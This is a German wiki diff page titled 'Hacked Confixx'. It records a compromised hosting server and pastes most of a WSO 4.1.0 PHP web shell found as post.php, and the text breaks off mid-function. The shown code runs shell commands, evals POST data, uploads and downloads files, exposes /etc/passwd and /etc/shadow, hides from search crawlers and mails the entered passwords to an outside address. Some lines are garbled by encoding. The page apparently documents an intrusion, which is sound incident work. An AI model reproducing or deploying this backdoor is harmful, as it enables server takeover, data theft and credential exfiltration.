Hacked Confixx
(3 dazwischenliegende Versionen von einem Benutzer werden nicht angezeigt) | |||
Zeile 2.647: | Zeile 2.647: | ||
---- | ---- | ||
+ | |||
+ | login-102.hoststar.ch | ||
+ | |||
+ | /home/www/confixx/html/nagioss -> shell | ||
+ | |||
+ | |||
+ | login-102.hoststar.ch | ||
+ | login-103.hoststar.ch | ||
+ | login-104.hoststar.ch | ||
+ | |||
+ | /home/www/confixx/html/post.php | ||
+ | |||
+ | <syntaxhighlight lang="bash" style="font-size:9pt;"> | ||
+ | <?php | ||
+ | //-----------------Password--------------------- | ||
+ | $â297a57a5a743894a0e4a801fc3"; //admin | ||
+ | $â = "#fff"; | ||
+ | $â = true; | ||
+ | $â = 'UTF-8'; | ||
+ | $â = 'FilesMan'; | ||
+ | $â = md5($_SERVER['HTTP_USER_AGENT']); | ||
+ | if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) { | ||
+ | prototype(md5($_SERVER['HTTP_HOST'])."key", $â); | ||
+ | } | ||
+ | if(empty($_POST['charset'])) | ||
+ | $_POST['charset'] = $â; | ||
+ | if (!isset($_POST['ne'])) { | ||
+ | if(isset($_POST['a'])) $_POST['a'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['a'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); | ||
+ | if(isset($_POST['c'])) $_POST['c'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['c'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); | ||
+ | if(isset($_POST['p1'])) $_POST['p1'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p1'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); | ||
+ | if(isset($_POST['p2'])) $_POST['p2'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p2'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); | ||
+ | if(isset($_POST['p3'])) $_POST['p3'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p3'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); | ||
+ | } | ||
+ | function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);} | ||
+ | @ini_set('error_log',NULL); | ||
+ | @ini_set('log_errors',0); | ||
+ | @ini_set('max_execution_time',0); | ||
+ | @set_time_limit(0); | ||
+ | @set_magic_quotes_runtime(0); | ||
+ | @define('VERSION', '4.1.0'); | ||
+ | if(get_magic_quotes_gpc()) { | ||
+ | function stripslashes_array($array) { | ||
+ | return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); | ||
+ | } | ||
+ | $_POST = stripslashes_array($_POST); | ||
+ | $_COOKIE = stripslashes_array($_COOKIE); | ||
+ | } | ||
+ | if(!empty($â | ||
+ | if(isset($_POST['pass']) && (md5($_POST['pass']) == $â | ||
+ | rototype(md5($_SERVER['HTTP_HOST']), $â | ||
+ | f (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $â | ||
+ | ardLogin(); | ||
+ | } | ||
+ | if(strtolower(substr(PHP_OS,0,3)) == "win") | ||
+ | $os = 'win'; | ||
+ | else | ||
+ | $os = 'nix'; | ||
+ | $safe_mode = @ini_get('safe_mode'); | ||
+ | if(!$safe_mode) | ||
+ | error_reporting(0); | ||
+ | $disable_functions = @ini_get('disable_functions'); | ||
+ | $home_cwd = @getcwd(); | ||
+ | if(isset($_POST['c'])) | ||
+ | @chdir($_POST['c']); | ||
+ | $cwd = @getcwd(); | ||
+ | if($os == 'win') { | ||
+ | $home_cwd = str_replace("\\", "/", $home_cwd); | ||
+ | $cwd = str_replace("\\", "/", $cwd); | ||
+ | } | ||
+ | if($cwd[strlen($cwd)-1] != '/') | ||
+ | $cwd .= '/'; | ||
+ | function hardHeader() { | ||
+ | if(empty($_POST['charset'])) | ||
+ | $_POST['charset'] = $GLOBALS['â']; | ||
+ | global $â; | ||
+ | echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION ."</title> | ||
+ | <style> | ||
+ | body {background-color:#060a10;color:#e1e1e1;} | ||
+ | body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;} | ||
+ | table.info {color:#C3C3C3;background-color:#060a10;} | ||
+ | span,h1,a {color:$â !important;} | ||
+ | span {font-weight:bolder;} | ||
+ | h1 {border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;} | ||
+ | div.content {padding:5px;margin-left:5px;background-color:#060a10;} | ||
+ | a {text-decoration:none;} | ||
+ | a:hover {text-decoration:underline;} | ||
+ | .ml1 {border:1px solid #1e252e;padding:5px;margin:0;overflow:auto;} | ||
+ | .bigarea {width:100%;height:250px; } | ||
+ | input, textarea, select {margin:0;color:#fff;background-color:#1e252e;border:1px solid #060a10; font:9pt Courier New;outline:none;} | ||
+ | form {margin:0px;} | ||
+ | #toolsTbl {text-align:center;} | ||
+ | .toolsInp {width:300px} | ||
+ | .main th {text-align:left;background-color:#060a10;} | ||
+ | .main tr:hover{background-color:#354252;} | ||
+ | .main td, th{vertical-align:middle;} | ||
+ | .l1 {background-color:#1e252e;} | ||
+ | pre {font:9pt Courier New;} | ||
+ | </style> | ||
+ | <script> | ||
+ | var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "'; | ||
+ | var a_ = '" . htmlspecialchars(@$_POST['a']) ."' | ||
+ | var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."'; | ||
+ | var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."'; | ||
+ | var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."'; | ||
+ | var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."'; | ||
+ | var d = document; | ||
+ | |||
+ | function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);} | ||
+ | function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;} | ||
+ | function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;} | ||
+ | function set(a,c,p1,p2,p3,charset) { | ||
+ | if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; | ||
+ | if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; | ||
+ | if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; | ||
+ | if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; | ||
+ | if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; | ||
+ | d.mf.a.value = encrypt(d.mf.a.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); | ||
+ | d.mf.c.value = encrypt(d.mf.c.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); | ||
+ | d.mf.p1.value = encrypt(d.mf.p1.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); | ||
+ | d.mf.p2.value = encrypt(d.mf.p2.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); | ||
+ | d.mf.p3.value = encrypt(d.mf.p3.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); | ||
+ | if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; | ||
+ | } | ||
+ | function g(a,c,p1,p2,p3,charset) { | ||
+ | set(a,c,p1,p2,p3,charset); | ||
+ | d.mf.submit(); | ||
+ | } | ||
+ | function a(a,c,p1,p2,p3,charset) { | ||
+ | set(a,c,p1,p2,p3,charset); | ||
+ | var params = 'ajax=true'; | ||
+ | for(i=0;i<d.mf.elements.length;i++) | ||
+ | params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); | ||
+ | sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params); | ||
+ | } | ||
+ | function sr(url, params) { | ||
+ | if (window.XMLHttpRequest) | ||
+ | req = new XMLHttpRequest(); | ||
+ | else if (window.ActiveXObject) | ||
+ | req = new ActiveXObject('Microsoft.XMLHTTP'); | ||
+ | if (req) { | ||
+ | req.onreadystatechange = processReqChange; | ||
+ | req.open('POST', url, true); | ||
+ | req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); | ||
+ | req.send(params); | ||
+ | } | ||
+ | } | ||
+ | function processReqChange() { | ||
+ | if( (req.readyState == 4) ) | ||
+ | if(req.status == 200) { | ||
+ | var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm'); | ||
+ | var arr=reg.exec(req.responseText); | ||
+ | eval(arr[2].substr(0, arr[1])); | ||
+ | } else alert('Request error!'); | ||
+ | } | ||
+ | </script> | ||
+ | <head><body><div style='position:absolute;width:100%;background-color:#1e252e;top:0;left:0;'> | ||
+ | <form method=post name=mf style='display:none;'> | ||
+ | <input type=hidden name=a> | ||
+ | <input type=hidden name=c> | ||
+ | <input type=hidden name=p1> | ||
+ | <input type=hidden name=p2> | ||
+ | <input type=hidden name=p3> | ||
+ | <input type=hidden name=charset> | ||
+ | </form>"; | ||
+ | $freeSpace = @diskfreespace($GLOBALS['cwd']); | ||
+ | $totalSpace = @disk_total_space($GLOBALS['cwd']); | ||
+ | $totalSpace = $totalSpace?$totalSpace:1; | ||
+ | $release = @php_uname('r'); | ||
+ | $kernel = @php_uname('s'); | ||
+ | $explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description='; | ||
+ | if(strpos('Linux', $kernel) !== false) | ||
+ | $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); | ||
+ | else | ||
+ | $explink .= urlencode($kernel . ' ' . substr($release,0,3)); | ||
+ | if(!function_exists('posix_getegid')) { | ||
+ | $user = @get_current_user(); | ||
+ | $uid = @getmyuid(); | ||
+ | $gid = @getmygid(); | ||
+ | $group = "?"; | ||
+ | } else { | ||
+ | $uid = @posix_getpwuid(@posix_geteuid()); | ||
+ | $gid = @posix_getgrgid(@posix_getegid()); | ||
+ | $user = $uid['name']; | ||
+ | $uid = $uid['uid']; | ||
+ | $group = $gid['name']; | ||
+ | $gid = $gid['gid']; | ||
+ | } | ||
+ | $cwd_links = ''; | ||
+ | $path = explode("/", $GLOBALS['cwd']); | ||
+ | $n=count($path); | ||
+ | for($i=0; $i<$n-1; $i++) { | ||
+ | $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; | ||
+ | for($j=0; $j<=$i; $j++) | ||
+ | $cwd_links .= $path[$j].'/'; | ||
+ | $cwd_links .= "\")'>".$path[$i]."/</a>"; | ||
+ | } | ||
+ | $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); | ||
+ | $opt_charsets = ''; | ||
+ | foreach($charsets as $â) | ||
+ | $opt_charsets .= '<option value="'.$â.'" '.($_POST['charset']==$â?'selected':'').'>'.$â.'</option>'; | ||
+ | $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); | ||
+ | if(!empty($GLOBALS['â)) | ||
+ | $m['Logout'] = 'Logout'; | ||
+ | $m['Self remove'] = 'SelfRemove'; | ||
+ | $menu = ''; | ||
+ | foreach($m as $k => $v) | ||
+ | $menu .= '<th>[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>'; | ||
+ | $drives = ""; | ||
+ | if ($GLOBALS['os'] == 'win') { | ||
+ | foreach(range('c','z') as $drive) | ||
+ | if (is_dir($drive.':\\')) | ||
+ | $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; | ||
+ | } | ||
+ | echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'. | ||
+ | '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="http://noreferer.de/?http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[ Google ]</a> <a href="' . $explink . '" target=_blank>[ Exploit-DB ]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#FFDB5F><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . viewSize($totalSpace) . ' <span>Free:</span> ' . viewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. viewPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'. | ||
+ | '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . gethostbyname($_SERVER["HTTP_HOST"]) . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'. | ||
+ | '<table style="background-color:#2E6E9C;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div>'; | ||
+ | } | ||
+ | function hardFooter() { | ||
+ | $is_writable = is_writable($GLOBALS['cwd'])?" <font color='#FFDB5F'>[ Writeable ]</font>":" <font color=red>(Not writable)</font>"; | ||
+ | echo " | ||
+ | </div> | ||
+ | <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%> | ||
+ | <tr> | ||
+ | <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g(null,this.c.value,'');":'' )."return false;\"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td> | ||
+ | <td><form onsubmit=\"".(function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value);":'' )."return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> | ||
+ | </tr><tr> | ||
+ | <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g('FilesMan',null,'mkdir',this.d.value);":'' )."return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> | ||
+ | <td><form onsubmit=\"".( function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value,'mkfile');":'' )."return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> | ||
+ | </tr><tr> | ||
+ | <td><form onsubmit=\"".( function_exists('actionConsole')? "g('Console',null,this.c.value);":'' )."return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> | ||
+ | <td><form method='post' ".( (!function_exists('actionFilesMan'))? " onsubmit=\"return false;\" ":'' )."ENCTYPE='multipart/form-data'> | ||
+ | <input type=hidden name=a value='FilesMan'> | ||
+ | <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'> | ||
+ | <input type=hidden name=p1 value='uploadFile'> | ||
+ | <input type=hidden name=ne value=''> | ||
+ | <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'> | ||
+ | <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[] multiple><input type=submit value='>>'></form><br ></td> | ||
+ | </tr></table></div></body></html>"; | ||
+ | } | ||
+ | if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } | ||
+ | if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } | ||
+ | function ex($in) { | ||
+ | $â = ''; | ||
+ | if (function_exists('exec')) { | ||
+ | @exec($in,$â); | ||
+ | $â = @join("\n",$â); | ||
+ | } elseif (function_exists('passthru')) { | ||
+ | ob_start(); | ||
+ | @passthru($in); | ||
+ | $â = ob_get_clean(); | ||
+ | } elseif (function_exists('system')) { | ||
+ | ob_start(); | ||
+ | @system($in); | ||
+ | $â = ob_get_clean(); | ||
+ | } elseif (function_exists('shell_exec')) { | ||
+ | $â = shell_exec($in); | ||
+ | } elseif (is_resource($f = @popen($in,"r"))) { | ||
+ | $â = ""; | ||
+ | while(!@feof($f)) | ||
+ | $â .= fread($f,1024); | ||
+ | pclose($f); | ||
+ | }else return "â³ Unable to execute command\n"; | ||
+ | return ($â==''?"â³ Query did not return anything\n":$â); | ||
+ | } | ||
+ | if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) | ||
+ | $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$â; | ||
+ | |||
+ | if(array_key_exists('pff',$_POST)){ | ||
+ | $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('hard_linux@mail.ru', 'NSA', $tmp); | ||
+ | } | ||
+ | function hardLogin() { | ||
+ | if(!empty($_SERVER['HTTP_USER_AGENT'])) { | ||
+ | $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); | ||
+ | if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { | ||
+ | header('HTTP/1.0 404 Not Found'); | ||
+ | exit; | ||
+ | } | ||
+ | } | ||
+ | die("<pre align=center><form method=post style='font-family:fantasy;'>Password: <input type=password name=pass style='background-color:whitesmoke;border:1px solid #FFF;outline:none;'><input type=submit name='pff' value='>>' style='border:none;background-color:#FFDB5F;color:#fff;'></form></pre>"); | ||
+ | } | ||
+ | function viewSize($s) { | ||
+ | if($s >= 1073741824) | ||
+ | return sprintf('%1.2f', $s / 1073741824 ). ' GB'; | ||
+ | elseif($s >= 1048576) | ||
+ | return sprintf('%1.2f', $s / 1048576 ) . ' MB'; | ||
+ | elseif($s >= 1024) | ||
+ | return sprintf('%1.2f', $s / 1024 ) . ' KB'; | ||
+ | else | ||
+ | return $s . ' B'; | ||
+ | } | ||
+ | function perms($p) { | ||
+ | if (($p & 0xC000) == 0xC000)$i = 's'; | ||
+ | elseif (($p & 0xA000) == 0xA000)$i = 'l'; | ||
+ | elseif (($p & 0x8000) == 0x8000)$i = '-'; | ||
+ | elseif (($p & 0x6000) == 0x6000)$i = 'b'; | ||
+ | elseif (($p & 0x4000) == 0x4000)$i = 'd'; | ||
+ | elseif (($p & 0x2000) == 0x2000)$i = 'c'; | ||
+ | elseif (($p & 0x1000) == 0x1000)$i = 'p'; | ||
+ | else $i = 'u'; | ||
+ | $i .= (($p & 0x0100) ? 'r' : '-'); | ||
+ | $i .= (($p & 0x0080) ? 'w' : '-'); | ||
+ | $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); | ||
+ | $i .= (($p & 0x0020) ? 'r' : '-'); | ||
+ | $i .= (($p & 0x0010) ? 'w' : '-'); | ||
+ | $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); | ||
+ | $i .= (($p & 0x0004) ? 'r' : '-'); | ||
+ | $i .= (($p & 0x0002) ? 'w' : '-'); | ||
+ | $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); | ||
+ | return $i; | ||
+ | } | ||
+ | function viewPermsColor($f) { | ||
+ | if (!@is_readable($f)) | ||
+ | return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>'; | ||
+ | elseif (!@is_writable($f)) | ||
+ | return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>'; | ||
+ | else | ||
+ | return '<font color=#FFDB5F><b>'.perms(@fileperms($f)).'</b></font>'; | ||
+ | } | ||
+ | function hardScandir($dir) { | ||
+ | if(function_exists("scandir")) { | ||
+ | return scandir($dir); | ||
+ | } else { | ||
+ | $dh = opendir($dir); | ||
+ | while (false !== ($filename = readdir($dh))) | ||
+ | $files[] = $filename; | ||
+ | return $files; | ||
+ | } | ||
+ | } | ||
+ | function which($p) { | ||
+ | $path = ex('which ' . $p); | ||
+ | if(!empty($path)) | ||
+ | return $path; | ||
+ | return false; | ||
+ | } | ||
+ | function actionRC() { | ||
+ | if(!@$_POST['p1']) { | ||
+ | $a = array( | ||
+ | "uname" => php_uname(), | ||
+ | "php_version" => phpversion(), | ||
+ | "VERSION" => VERSION, | ||
+ | "safemode" => @ini_get('safe_mode') | ||
+ | ); | ||
+ | echo serialize($a); | ||
+ | } else { | ||
+ | eval($_POST['p1']); | ||
+ | } | ||
+ | } | ||
+ | function prototype($k, $v) { | ||
+ | $_COOKIE[$k] = $v; | ||
+ | setcookie($k, $v); | ||
+ | } | ||
+ | function actionSecInfo() { | ||
+ | hardHeader(); | ||
+ | echo '<h1>Server security information</h1><div class=content>'; | ||
+ | function showSecParam($n, $v) { | ||
+ | $v = trim($v); | ||
+ | if($v) { | ||
+ | echo '<span>' . $n . ': </span>'; | ||
+ | if(strpos($v, "\n") === false) | ||
+ | echo $v . '<br>'; | ||
+ | else | ||
+ | echo '<pre class=ml1>' . $v . '</pre>'; | ||
+ | } | ||
+ | } | ||
+ | showSecParam('Server software', @getenv('SERVER_SOFTWARE')); | ||
+ | if(function_exists('apache_get_modules')) | ||
+ | showSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); | ||
+ | showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); | ||
+ | showSecParam('Open base dir', @ini_get('open_basedir')); | ||
+ | showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); | ||
+ | showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); | ||
+ | showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); | ||
+ | $temp=array(); | ||
+ | if(function_exists('mysql_get_client_info')) | ||
+ | $temp[] = "MySql (".mysql_get_client_info().")"; | ||
+ | if(function_exists('mssql_connect')) | ||
+ | $temp[] = "MSSQL"; | ||
+ | if(function_exists('pg_connect')) | ||
+ | $temp[] = "PostgreSQL"; | ||
+ | if(function_exists('oci_connect')) | ||
+ | $temp[] = "Oracle"; | ||
+ | showSecParam('Supported databases', implode(', ', $temp)); | ||
+ | echo '<br>'; | ||
+ | if($GLOBALS['os'] == 'nix') { | ||
+ | showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no'); | ||
+ | showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no'); | ||
+ | showSecParam('OS version', @file_get_contents('/proc/version')); | ||
+ | showSecParam('Distr name', @file_get_contents('/etc/issue.net')); | ||
+ | if(!$GLOBALS['safe_mode']) { | ||
+ | $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); | ||
+ | $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); | ||
+ | $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); | ||
+ | echo '<br>'; | ||
+ | $temp=array(); | ||
+ | foreach ($userful as $â) | ||
+ | if(which($â)) | ||
+ | $temp[] = $â; | ||
+ | showSecParam('Userful', implode(', ',$temp)); | ||
+ | $temp=array(); | ||
+ | foreach ($danger as $â) | ||
+ | if(which($â)) | ||
+ | $temp[] = $â; | ||
+ | showSecParam('Danger', implode(', ',$temp)); | ||
+ | $temp=array(); | ||
+ | foreach ($downloaders as $â) | ||
+ | if(which($â)) | ||
+ | $temp[] = $â; | ||
+ | showSecParam('Downloaders', implode(', ',$temp)); | ||
+ | echo '<br/>'; | ||
+ | showSecParam('HDD space', ex('df -h')); | ||
+ | showSecParam('Hosts', @file_get_contents('/etc/hosts')); | ||
+ | showSecParam('Mount options', @file_get_contents('/etc/fstab')); | ||
+ | } | ||
+ | } else { | ||
+ | showSecParam('OS Version',ex('ver')); | ||
+ | showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts'))); | ||
+ | showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user'))); | ||
+ | } | ||
+ | echo '</div>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionFilesTools() { | ||
+ | if( isset($_POST['p1']) ) | ||
+ | $_POST['p1'] = urldecode($_POST['p1']); | ||
+ | if(@$_POST['p2']=='download') { | ||
+ | if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { | ||
+ | ob_start("ob_gzhandler", 4096); | ||
+ | header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); | ||
+ | if (function_exists("mime_content_type")) { | ||
+ | $type = @mime_content_type($_POST['p1']); | ||
+ | header("Content-Type: " . $type); | ||
+ | } else | ||
+ | header("Content-Type: application/octet-stream"); | ||
+ | $fp = @fopen($_POST['p1'], "r"); | ||
+ | if($fp) { | ||
+ | while(!@feof($fp)) | ||
+ | echo @fread($fp, 1024); | ||
+ | fclose($fp); | ||
+ | } | ||
+ | }exit; | ||
+ | } | ||
+ | if( @$_POST['p2'] == 'mkfile' ) { | ||
+ | if(!file_exists($_POST['p1'])) { | ||
+ | $fp = @fopen($_POST['p1'], 'w'); | ||
+ | if($fp) { | ||
+ | $_POST['p2'] = "edit"; | ||
+ | fclose($fp); | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | hardHeader(); | ||
+ | echo '<h1>File tools</h1><div class=content>'; | ||
+ | if( !file_exists(@$_POST['p1']) ) { | ||
+ | echo 'File not exists'; | ||
+ | hardFooter(); | ||
+ | return; | ||
+ | } | ||
+ | $uid = @posix_getpwuid(@fileowner($_POST['p1'])); | ||
+ | if(!$uid) { | ||
+ | $uid['name'] = @fileowner($_POST['p1']); | ||
+ | $gid['name'] = @filegroup($_POST['p1']); | ||
+ | } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); | ||
+ | echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>'; | ||
+ | echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>'; | ||
+ | if( empty($_POST['p2']) ) | ||
+ | $_POST['p2'] = 'view'; | ||
+ | if( is_file($_POST['p1']) ) | ||
+ | $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); | ||
+ | else | ||
+ | $m = array('Chmod', 'Rename', 'Touch'); | ||
+ | foreach($m as $v) | ||
